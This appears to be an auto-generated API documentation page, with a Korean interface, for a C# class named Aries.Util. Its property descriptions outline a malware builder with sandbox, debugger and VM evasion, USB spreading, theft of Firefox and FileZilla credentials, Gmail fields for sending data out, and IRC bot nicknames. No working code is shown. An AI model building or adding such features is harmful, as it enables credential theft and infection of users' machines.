C# 클래스 Aries.Util

파일 보기 프로젝트 열기: EAXrec/Aries

공개 프로퍼티들

프로퍼티 타입 설명
AESClass SimpleAES
AntiSandbox bool
AntiSniffDebug bool
AntiSysinternals bool
AntiVirtual bool
CrashType int
DisplayErrorMsg bool
DisplayInVirtual bool
EncryptHost bool
ErrorBody string
ErrorTitle string
FSplit string
FSplit2 string
FSplit3 string
FSplit4 string
GmailPass string
GmailUser string
OriginalSize int
PackedSize int
ProtectNum string
SendFirefoxFilezilla bool
USBSpread bool
UseRandomNick bool
compressed bool
encryptionkey byte[]
file1TargetFileOutput string
msgIcon string
stub string

공개 메소드들

메소드 설명
IsProcessRunning ( string file_name ) : bool

Check for a process name and window title

Reverse ( string x ) : string

Reverse a string

getRandNum ( int length ) : string

Return a string of random letters (removed numbers for more compatible use)

비공개 메소드들

메소드 설명
GetModuleHandle ( string lpModuleName ) : IntPtr

메소드 상세

IsProcessRunning() 공개 정적인 메소드

Check for a process name and window title
public static IsProcessRunning ( string file_name ) : bool
file_name string Process or window title to check for
리턴 bool

Reverse() 공개 정적인 메소드

Reverse a string
public static Reverse ( string x ) : string
x string String to reverse
리턴 string

getRandNum() 공개 정적인 메소드

Return a string of random letters (removed numbers for more compatible use)
public static getRandNum ( int length ) : string
length int Length of random string to return
리턴 string

프로퍼티 상세

AESClass 공개적으로 정적으로 프로퍼티

public static SimpleAES AESClass
리턴 SimpleAES

AntiSandbox 공개적으로 정적으로 프로퍼티

Anti Sandboxie
public static bool AntiSandbox
리턴 bool

AntiSniffDebug 공개적으로 정적으로 프로퍼티

Anti Sniffers/Debuggers
public static bool AntiSniffDebug
리턴 bool

AntiSysinternals 공개적으로 정적으로 프로퍼티

Anti Sysinternals products
public static bool AntiSysinternals
리턴 bool

AntiVirtual 공개적으로 정적으로 프로퍼티

Anti Virtual Environment
public static bool AntiVirtual
리턴 bool

CrashType 공개적으로 정적으로 프로퍼티

Numeric value for the way that the program will end itself
public static int CrashType
리턴 int

DisplayErrorMsg 공개적으로 정적으로 프로퍼티

Anti Sandboxie
public static bool DisplayErrorMsg
리턴 bool

DisplayInVirtual 공개적으로 정적으로 프로퍼티

Display the error msg if it's enabled and if running in a Virtual Environement
public static bool DisplayInVirtual
리턴 bool

EncryptHost 공개적으로 정적으로 프로퍼티

Encrypt the host file?
public static bool EncryptHost
리턴 bool

ErrorBody 공개적으로 정적으로 프로퍼티

Body of the error msg to display if enabled
public static string ErrorBody
리턴 string

ErrorTitle 공개적으로 정적으로 프로퍼티

Title of the error msg to display if enabled
public static string ErrorTitle
리턴 string

FSplit 공개적으로 정적으로 프로퍼티

public static string FSplit
리턴 string

FSplit2 공개적으로 정적으로 프로퍼티

public static string FSplit2
리턴 string

FSplit3 공개적으로 정적으로 프로퍼티

public static string FSplit3
리턴 string

FSplit4 공개적으로 정적으로 프로퍼티

public static string FSplit4
리턴 string

GmailPass 공개적으로 정적으로 프로퍼티

Gmail Password
public static string GmailPass
리턴 string

GmailUser 공개적으로 정적으로 프로퍼티

Gmail Username
public static string GmailUser
리턴 string

OriginalSize 공개적으로 정적으로 프로퍼티

Original size of the target file
public static int OriginalSize
리턴 int

PackedSize 공개적으로 정적으로 프로퍼티

public static int PackedSize
리턴 int

ProtectNum 공개적으로 정적으로 프로퍼티

public static string ProtectNum
리턴 string

SendFirefoxFilezilla 공개적으로 정적으로 프로퍼티

Send Firefox/Filezilla info after running 1st time
public static bool SendFirefoxFilezilla
리턴 bool

USBSpread 공개적으로 정적으로 프로퍼티

Spread to USB drives after running 1st time
public static bool USBSpread
리턴 bool

UseRandomNick 공개적으로 정적으로 프로퍼티

use a random irc nick
public static bool UseRandomNick
리턴 bool

compressed 공개적으로 정적으로 프로퍼티

Compress the target file?
public static bool compressed
리턴 bool

encryptionkey 공개적으로 정적으로 프로퍼티

Encryption key used for AES
public static byte[] encryptionkey
리턴 byte[]

file1TargetFileOutput 공개적으로 정적으로 프로퍼티

The target file contents, stored in a string
public static string file1TargetFileOutput
리턴 string

msgIcon 공개적으로 정적으로 프로퍼티

public static string msgIcon
리턴 string

stub 공개적으로 정적으로 프로퍼티

string to store the stub in
public static string stub
리턴 string